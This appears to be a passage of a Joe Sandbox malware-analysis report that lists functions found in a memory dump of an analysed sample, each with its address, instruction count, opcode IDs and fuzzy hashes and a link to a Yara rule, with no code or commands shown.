                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                                                              • Instruction ID: 65ba9ac954c978f6f193388300dff0e5572f3e0deb6083acb6bbddb8362169a1
                                                                                                                                                              • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                                                              • Instruction Fuzzy Hash: 60F08935341D2347EB76AA2F9C20B2EA655AFD0B50B1D052E9655CB794DF60D8018790
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 015FE872 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                                                                              • Instruction ID: b93de18baabd52efcc8837abd18e31f11ba02e6a440e4f3a6f04097b8b24660c
                                                                                                                                                              • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                                                                              • Instruction Fuzzy Hash: 7FF054737115129BD321AA4DCC81F16B7A9FFD5A60F1A0469A704AF270C760EC0187D0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 015FC89D Relevance: .0, Instructions: 36COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 1e25cf167f5b803d84fe6c7f700e57fb00d6ea777f28835c2936df50cc577aa4
                                                                                                                                                              • Instruction ID: 097e99a2498f7ec6f592ba2a4cf663119de742117dffff2f64617d3e77f05cf0
                                                                                                                                                              • Opcode Fuzzy Hash: 1e25cf167f5b803d84fe6c7f700e57fb00d6ea777f28835c2936df50cc577aa4
                                                                                                                                                              • Instruction Fuzzy Hash: 6AF08C706053099FC354EF68C845A1ABBE4FF98610F40466AB998DB390E634E900C796
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 015A0854 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                                                                              • Instruction ID: 42caaad82499de79148b583fd12939137aa0790234571ec65b207dec575481ed
                                                                                                                                                              • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                                                                              • Instruction Fuzzy Hash: E2F0B472660206AFE714DB25CC01F5AB6E9FF98340F158478A545DB2A0FAB0DD01C698
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 015FC912 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 884135566323931d20c3458964d8916901f08501379603a30c6191ad3fc0bf3d
                                                                                                                                                              • Instruction ID: e0cecaffcc53623a671eb863be13377ee4d53784dbd7a920e96f21438f0b3722
                                                                                                                                                              • Opcode Fuzzy Hash: 884135566323931d20c3458964d8916901f08501379603a30c6191ad3fc0bf3d
                                                                                                                                                              • Instruction Fuzzy Hash: 6FF0AF70A0120EDFCB04EF69C555E9EB7F4FF58300F008069A905EB385DA34EA01CB50
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 015747FB Relevance: .0, Instructions: 33COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: d5dfacd14026f1ebdc8867ff7ee01381ad227aafcddde6206018bbf90110b7ea
                                                                                                                                                              • Instruction ID: 9f5b413384a7f922d8809870d31523d37a20e5e4ed42e5de6d5e95a1471e6cc8
                                                                                                                                                              • Opcode Fuzzy Hash: d5dfacd14026f1ebdc8867ff7ee01381ad227aafcddde6206018bbf90110b7ea
                                                                                                                                                              • Instruction Fuzzy Hash: 88F0BE319166E99FE732DB6CE496B2DBBD4BB02624F08896AD5998F502C734D880C650
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 01630115 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 02d2c4f6cbd22dcd26364d9919dda20a34cf1cb0c3e49a18b6aacbf01decc44b
                                                                                                                                                              • Instruction ID: 428fadd5476258b2e9c05c0db7d06095a7844b26a29761180853b6d5dbc08746
                                                                                                                                                              • Opcode Fuzzy Hash: 02d2c4f6cbd22dcd26364d9919dda20a34cf1cb0c3e49a18b6aacbf01decc44b
                                                                                                                                                              • Instruction Fuzzy Hash: 7DF05C37415AD11ADF325B7CFC503D22F65A7C2414F092589DCA097319C6748897C764
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 015AC5ED Relevance: .0, Instructions: 31COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 02b0ce0f1252c30c6f6294c887cc9d0e2aa42714fe945f9bd55563e311fcc534
                                                                                                                                                              • Instruction ID: 1a2bf99a92530a751c76e5c15b594bd135a6960a41297a3d3a647af4f20e3747
                                                                                                                                                              • Opcode Fuzzy Hash: 02b0ce0f1252c30c6f6294c887cc9d0e2aa42714fe945f9bd55563e311fcc534
                                                                                                                                                              • Instruction Fuzzy Hash: 7DF027719916919FE732D71CC188B1D7BD4BB447A4F889825D406CF612C770F880CA50
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 015B2619 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                                                                              • Instruction ID: 4a926d4d7826f58e73d90fff840df867bdf1851dfe27bfa436e1910e9ca8cab1
                                                                                                                                                              • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                                                                              • Instruction Fuzzy Hash: 4EE092723006022BE712AE598CC0F87776EAFD2B10F044079B6045E291CAE2AC0982A4
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 01606030 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                                                                              • Instruction ID: 381eeaa89289195b7c433fc2f852f58163b282ddab97f9b95a5431c98496ec58
                                                                                                                                                              • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                                                                              • Instruction Fuzzy Hash: D7F0A0721402049FE326CF09DE40F53B7F8EB05364F01C025E60A9B2A0D37AEC50CBA0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 01570710 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                                                                              • Instruction ID: 22d558a4302d8a4c6b3a219980b5a3babbfafe15a5ba572635467c143eb1bac2
                                                                                                                                                              • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                                                                              • Instruction Fuzzy Hash: A8F0E53A2047819FDB16DF19E041AA9BFE4FB46750B000458F8428F341D731E981CF54
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 015A49D0 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                                                                              • Instruction ID: a79350ea3e9d0e4052a2aac0ba2d2170fe02f8be561bf8fa01bc84858a70047d
                                                                                                                                                              • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                                                                              • Instruction Fuzzy Hash: A7E09232294146ABD3212A998810B7E77A7BBD07A0F990429E2019F150DBF0DC40C798
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0161678E Relevance: .0, Instructions: 27COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                                                                              • Instruction ID: 078f323a443d1ba328e4aa06ba8a361967a6ffa557bf59443ff6792667b8450d
                                                                                                                                                              • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                                                                              • Instruction Fuzzy Hash: DFE0DF72A41111BBDB21A799CD01FAABEACEB90EA0F090094B601EB1D4E5B0DE00C6D0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 015725E0 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              • Opcode ID: bf1de5e07aa8f4b4f19fdbd26877bbd5d85be4f3234b84b8fd2ef875231681d3
                                                                                                                                                              • Instruction ID: f2f68c38e57230ae2a6ce3ca7a6cb84bb62ef3a73f7d97f69cc5658bf8cb98ae
                                                                                                                                                              • Opcode Fuzzy Hash: bf1de5e07aa8f4b4f19fdbd26877bbd5d85be4f3234b84b8fd2ef875231681d3
                                                                                                                                                              • Instruction Fuzzy Hash: DCE092721005559BC722BF29ED02F8A779AFFA0760F014515F1555B1A0CB70AC10C794
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 015F4000 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                                                                              • Instruction ID: 617a8aed7f30a3d16b4e4bf23f2508288d388edf5fce124f741a8e3c3bd21135
                                                                                                                                                              • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                                                                              • Instruction Fuzzy Hash: 5DE052753003459FE715CF19C054B677BBABFD5A50F28C079AA488F205EB36E942CB51
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0156823B Relevance: .0, Instructions: 21COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                                                                              • Instruction ID: cc02bf4a496886e499897025e3390d9c21003942c53c4fa3a5b1763cf216d08e
                                                                                                                                                              • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                                                                              • Instruction Fuzzy Hash: D3E08C31150A12EFDB322E15DC40B9676A9FFA8B50F104929E0812E0A48AB0A881CA94
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 01572050 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 7dd42763001e7d92cf63c173b0224da038f45557a02487a19440eba2ad8c9c40
                                                                                                                                                              • Instruction ID: c50458fe6d175b5c8a3438f537e05c91d7bf48ecc06cc0289e0100327bb44760
                                                                                                                                                              • Opcode Fuzzy Hash: 7dd42763001e7d92cf63c173b0224da038f45557a02487a19440eba2ad8c9c40
                                                                                                                                                              • Instruction Fuzzy Hash: EDE08C722004616BC311FA5DED11E4A739AFFE4660F004121F1509B2A0CA60AC00C794
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 015A8A90 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                                                                                              • Instruction ID: 9158b05a44cf84d9a7de9345c0067a895b80903c5b05412ba303fc85ef4b813f
                                                                                                                                                              • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                                                                                              • Instruction Fuzzy Hash: 12E02633150A0487C328EE18C421B7677E4FF44730F08463EA6134B380C530E804C794
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 015C6AA4 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                                                                                              • Instruction ID: f53fc655ab1548be6ac949384dafbfc720946bd932e483c28f67c728179d3d8d
                                                                                                                                                              • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                                                                                              • Instruction Fuzzy Hash: AAD05E36511A50EFC3329F1BEE00C13BBF9FFC4E10709062EA54687A20C671E806CBA0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 015AE59C Relevance: .0, Instructions: 16COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                                                                              • Instruction ID: aee10c48bc0ac6f34eeb12140dc6139ea1cd7e92127cfc0e869e48dee68f14dd
                                                                                                                                                              • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                                                                              • Instruction Fuzzy Hash: 48D0A972A14620ABDB72AA1CFC04FC333E9BB88B20F060459F008CB150C360EC81CA84
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 015EE908 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                                                                              • Instruction ID: 544d408b1c32cc94929c7dce81aeaebfe3b0d465326949fda7015f3ed5ec458c
                                                                                                                                                              • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                                                                              • Instruction Fuzzy Hash: B0E08C31A207809BCF16EF59D645F4EBBF8FB84B00F140044A008AF220C324EC00CB40
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0156A0E3 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                                                              • Instruction ID: 2df4e3df9f2ba7f34e92bc671c421b37473e7b201a3b28184c2d6e0e9fb29fe0
                                                                                                                                                              • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                                                              • Instruction Fuzzy Hash: AAD0123232607197DB296655A914F677959BFC1AA4F1A006D790ABB900C5158C42D6E0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 015AA830 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                                                                              • Instruction ID: 7e7e4015e3728fef6df2d37188d550ea8fd9624b6a61846b2f9e255266c445f4
                                                                                                                                                              • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                                                                              • Instruction Fuzzy Hash: 81D012771E054DBBCB11AF66DC01F957BA9FBA4BA0F444020B5048B5A0C63AE950D584
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 015ACA24 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 32b65743175fd0d46e1255cb61bac965984cdb5dd62d7fd5a1146bfc20e2c08d
                                                                                                                                                              • Instruction ID: 62dbdb43c8283ef8c1b1250525bc8a61f2e386e671676ce883ba8525115b6245
                                                                                                                                                              • Opcode Fuzzy Hash: 32b65743175fd0d46e1255cb61bac965984cdb5dd62d7fd5a1146bfc20e2c08d
                                                                                                                                                              • Instruction Fuzzy Hash: A2D0A735A51502CBDF1ADF08C928D3E36F0FF10640B80006CE70099520D374EC01C610
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 015802A0 Relevance: .0, Instructions: 13COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                                                              • Instruction ID: 7d812a8b055e02e6bf9f4c3142ffc25ae39e0fe1e614aa75109cb44acfae0b5a
                                                                                                                                                              • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                                                              • Instruction Fuzzy Hash: FDD09235312A80CFD72A9B0CC5A4B1933A4BB44A44F810890E402CBBA2D668D944CA00
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 015AC700 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
